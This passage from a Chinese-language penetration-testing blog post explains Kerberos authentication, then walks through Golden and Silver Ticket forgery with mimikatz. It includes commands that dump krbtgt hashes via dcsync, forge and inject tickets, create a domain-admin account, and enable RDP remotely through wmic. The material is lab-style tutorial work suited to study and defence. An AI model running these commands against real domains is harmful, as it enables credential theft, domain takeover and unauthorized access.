<li><p>Ticket：Client 通过TGS Exchange获得的被Server Key加密的Ticket</p>
</li>
<li><p>Authenticator：用以证明Ticket的拥有者是否就是自己，所以用Session Key进行加密。</p>
<p>内容包括：（1）Client Info（2）Timestamp</p>
</li>
<li><p>Flag：用于表示Client是否需要进行双向验证</p>
</li>
</ul>
<p><strong>响应：</strong></p>
<p>Server接收到Request之后,首先通过自己的Master Key(krbtgt的密码hash处理)解密ST，从而获得Session Key（SServer-Client）。通过Session Key（SServer-Client）解密Authenticator，进而验证对方的身份。验证成功，让Client访问需要访问的资源，否则直接拒绝对方的请求。</p>
<p>对于需要进行双向验证，Server从Authenticator提取Timestamp，使用Session Key（SServer-Client）进行加密，并将其发送给Client用于Client验证Server的身份。</p>
<p><strong>双向认证：</strong><br> 到目前为止，服务端已经完成了对客户端的验证，但是，整个认证过程还没有结束。接下来就是Client对Server进行验证以确保Client所访问的不是一个钓鱼服务.</p>
<p><strong>Client验证Server：</strong><br> Server需要将Authenticator3中解密出来的Timestamp再次用Session Key进行加密,并发送给Client。Client再用缓存Session Key进行解密,如果Timestamp和之前的内容完全一样,则可以证明此时的Server是它想访问的Server。</p>
<h4 id="黄金票据伪造-Golden-Ticket"><a href="#黄金票据伪造-Golden-Ticket" class="headerlink" title="黄金票据伪造(Golden Ticket)"></a>黄金票据伪造(Golden Ticket)</h4><h5 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h5><p>在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中，krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash，就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。</p>
<h5 id="伪造金票的所需条件"><a href="#伪造金票的所需条件" class="headerlink" title="伪造金票的所需条件"></a><strong>伪造金票的所需条件</strong></h5><pre><code>1、域名称
2、域的krbtgt用户的SID
3、域的krbtgt账号的HASH
4、伪造任意用户名</code></pre>
<h5 id="HASH和SID获取"><a href="#HASH和SID获取" class="headerlink" title="HASH和SID获取"></a>HASH和SID获取</h5><p>上传mimikatz到域控主机,以管理员权限运行CMD</p>
<p>执行以下命令获取krbtgt用户的hash</p>
<pre><code>mimikatz.exe &quot;privilege::debug&quot; &quot;lsadump::dcsync /domain:edu.org /all /csv&quot; &quot;exit&quot;&gt;log.txt</code></pre>
<p><img src="/images/196.png"></p>
<p>再执行以下命令可以看到krbtgt用户的SID</p>
<pre><code>lsadump::dcsync /domain:edu.org /user:krbtgt</code></pre>
<p><img src="/images/197.png"></p>
<p>注：原Object Security ID最后面有个-502是作为标识的，在制作时需要手动删除</p>
<h5 id="黄金票据制作"><a href="#黄金票据制作" class="headerlink" title="黄金票据制作"></a>黄金票据制作</h5><pre><code>1、/user: 指定伪造的用户名，一般是Administrator
2、/sid: 域的sid值
3、/domain: 指定域名
4、/krbtgt: 域内用户krbtgt的ntlm hash值</code></pre>
<pre><code>kerberos::golden /user:Administrator /sid:域内sid /krbtgt:ntlm-hash /domain:域名 /ticket:ticket.kirbi

kerberos::golden /user:Administrator /sid:S-1-5-21-3658974542-4157274802-4269447764 /krbtgt:129d836ceeac69cbb52340ef1bbdc6d3 /domain:edu.org /ticket:ticket.kirbi</code></pre>
<p><img src="/images/199.png"></p>
<p>先通过kerberos::purge清空票据缓存；kerberos::list列出票据显示为空，说明清空了所以票据</p>
<pre><code>kerberos::purge
kerberos::list</code></pre>
<p><img src="/images/200.png"></p>
<p>把票据载入内存</p>
<pre><code>kerberos::ptt ticket.kirbi</code></pre>
<p><img src="/images/198.png"></p>
<p>注：如果以管理员权限打开的mimikatz，则需要用管理员权限打开CMD,不然会连接不上目标机器</p>
<p>是否真正写入内存需要打开cmd用以下命令验证，只有缓存是1才是真正写入</p>
<pre><code>klist</code></pre>
<p><img src="/images/201.png"></p>
<p>另外两种执行方法</p>
<p>①用cmd运行mimikatz</p>
<pre><code>mimikatz.exe &quot;privilege::debug&quot; &quot;kerberos::golden /user:Administrator /sid:S-1-5-21-3658974542-4157274802-4269447764 /krbtgt:129d836ceeac69cbb52340ef1bbdc6d3 /domain:edu.org /ptt&quot; &quot;exit&quot;</code></pre>
<p>②用mimikatz执行写入内存</p>
<pre><code>kerberos::golden /user:Administrator /sid:S-1-5-21-3658974542-4157274802-4269447764 /krbtgt:129d836ceeac69cbb52340ef1bbdc6d3 /domain:edu.org /ptt</code></pre>
<h5 id="利用"><a href="#利用" class="headerlink" title="利用"></a><strong>利用</strong></h5><h6 id="①创建超管用户，然后利用超管用户登录域内其他主机接管。"><a href="#①创建超管用户，然后利用超管用户登录域内其他主机接管。" class="headerlink" title="①创建超管用户，然后利用超管用户登录域内其他主机接管。"></a>①创建超管用户，然后利用超管用户登录域内其他主机接管。</h6><pre><code>net user chen qaz@123! /add /domain
net group &quot;domain admins&quot; chen /add /domain</code></pre>
<p>执行dir的时候连接DC,测试金票伪造是否成功只能使用<strong>主机名拼接域名</strong>，用IP去测试会失败。</p>
<p><img src="/images/202.png"></p>
<p><strong>执行命令打开域内其他目标机器3389端口</strong></p>
<pre><code>wmic /node:192.168.88.135 /user:edu.org\chen /password:qaz@123! process call create &#39;cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f&#39;</code></pre>
<p><img src="/images/204.png"></p>
<p>然后利用chen这个刚创建的超管用户进行远程登录机器接管</p>
<h6 id="②利用PsExec提权进行交互"><a href="#②利用PsExec提权进行交互" class="headerlink" title="②利用PsExec提权进行交互"></a><strong>②利用PsExec提权进行交互</strong></h6><p><img src="/images/203.png"></p>
<p><strong>用金票进行访问域内的其他主机复现失败(不知道为啥)</strong></p>
<p><img src="/images/205.png"></p>
<h4 id="白银票据伪造-Silver-Ticket"><a href="#白银票据伪造-Silver-Ticket" class="headerlink" title="白银票据伪造(Silver Ticket)"></a>白银票据伪造(Silver Ticket)</h4><h5 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h5><p>如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。<br>在Kerberos认证的第三部，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。<br>所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。</p>
<h5 id="伪造银票的所需条件"><a href="#伪造银票的所需条件" class="headerlink" title="伪造银票的所需条件"></a><strong>伪造银票的所需条件</strong></h5><pre><code>1、/domain: 指定域名
2、/sid: 客户端用户的sid号
3、/target: 需要访问的域服务器的计算机全名
4、/rc4: 目标服务器的NTLM Hash值 通常情况下，例如目标机器名为m1sn0w，那么这里需要指定的NTLM Hash值应该为m1sn0w$账号对应的NTLM Hash值
5、/service：需要伪造的服务，例如cifs访问文件服务
6、/user: 指定需要伪造的用户，一般使用Administrator</code></pre>
<p>服务类型可以从以下内容中来进行选择，因为我们没有TGT去不断申请ticket，所以只能针对某一些服务来进行伪造</p>
<p><img src="/images/206.png"></p>
<h5 id="所需要的信息获取"><a href="#所需要的信息获取" class="headerlink" title="所需要的信息获取"></a>所需要的信息获取</h5><p><strong>客户端用户的sid号</strong></p>
<p><code>sid</code>值：这里需要指定域内的<code>sid</code>值，我们可以通过<code>whoami /all</code>来进行查询</p>
<pre><code>whoami /all</code></pre>
<p><img src="/images/207.png"></p>
<p><strong>目标机器的<code>NTLM Hash</code>值</strong></p>
<p>目标机器的NTLM Hash值，而不是域内账号的NTLM Hash值。拿着域管的NTLM Hash去生成白银票据，发现是不能进行横向移动的。这里需要指定机器的NTLM Hash值，也就是说需要指定机器本地账户的NTLM Hash值。通常情况下，例如目标机器名为m1sn0w，那么这里需要指定的NTLM Hash值应该为m1sn0w$账号对应的NTLM Hash值。(如果hostname查出的机器名字是大写EAS3,则对应的hash的username也必须是大写EAS3，而不是小写eas3)</p>
<p><img src="/images/208.png"></p>
<h5 id="白银票据制作"><a href="#白银票据制作" class="headerlink" title="白银票据制作"></a>白银票据制作</h5><pre><code>kerberos::golden /domain:edu.org /sid:S-1-5-21-3485537082-426029256-2976247771 /target:EAS3.edu.org /rc4:fd6054cb66b99ee07c3ef0c0ae85b4f2 /service:cifs /user:Administrator /ptt</code></pre>
<p><img src="/images/209.png"></p>
<h5 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h5><h6 id="利用PsExec提权进行交互"><a href="#利用PsExec提权进行交互" class="headerlink" title="利用PsExec提权进行交互"></a>利用PsExec提权进行交互</h6><p><img src="/images/210.png"></p>
<h4 id="金票和银票的区别"><a href="#金票和银票的区别" class="headerlink" title="金票和银票的区别"></a>金票和银票的区别</h4><h5 id="获取的权限不同"><a href="#获取的权限不同" class="headerlink" title="获取的权限不同"></a>获取的权限不同</h5><p>金票：伪造的TGT，可以获取任意Kerberos的访问权限<br>银票：伪造的ST，只能访问指定的服务，如CIFS</p>
<h5 id="认证流程不同"><a href="#认证流程不同" class="headerlink" title="认证流程不同"></a>认证流程不同</h5><p>金票：同KDC交互，但不同AS交互<br>银票：不同KDC交互，直接访问Server</p>
<h5 id="加密方式不同"><a href="#加密方式不同" class="headerlink" title="加密方式不同"></a>加密方式不同</h5><p>金票：由krbtgt NTLM Hash 加密<br>银票：由服务账号 NTLM Hash 加密</p>
<h3 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h3><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10439#toc-10">内网渗透初探(一) | 小白简单学习内网渗透 - 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/23a4e8978a30">Kerberos认证 - 简书 (jianshu.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/905605f1ad08">Kerberos认证步骤 - 简书 (jianshu.com)</a></p>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">0xEaS</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://keepaha.com/2022/01/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8Fpass%E7%B3%BB%E5%88%97%E6%94%BB%E5%87%BB/">http://keepaha.com/2022/01/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8Fpass%E7%B3%BB%E5%88%97%E6%94%BB%E5%87%BB/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">0xEaS</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.jpg" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2022/02/20/Thinkphp6-0-12LTS%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/16.jpg" class="responsive-img" alt="Thinkphp6.0.12LTS反序列化漏洞分析">
                        
                        <span class="card-title">Thinkphp6.0.12LTS反序列化漏洞分析</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-02-20
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            0xEaS
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/12/02/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B9%8B%E5%A6%82%E4%BD%95%E9%9A%90%E8%97%8F%E8%87%AA%E5%B7%B1/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/6.jpg" class="responsive-img" alt="渗透测试之如何隐藏自己">
                        
                        <span class="card-title">渗透测试之如何隐藏自己</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-12-02
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            0xEaS
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">0xEaS</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/chenguangyi1/chenguangyi1.github.io" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:742917877@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=742917877" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 742917877" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
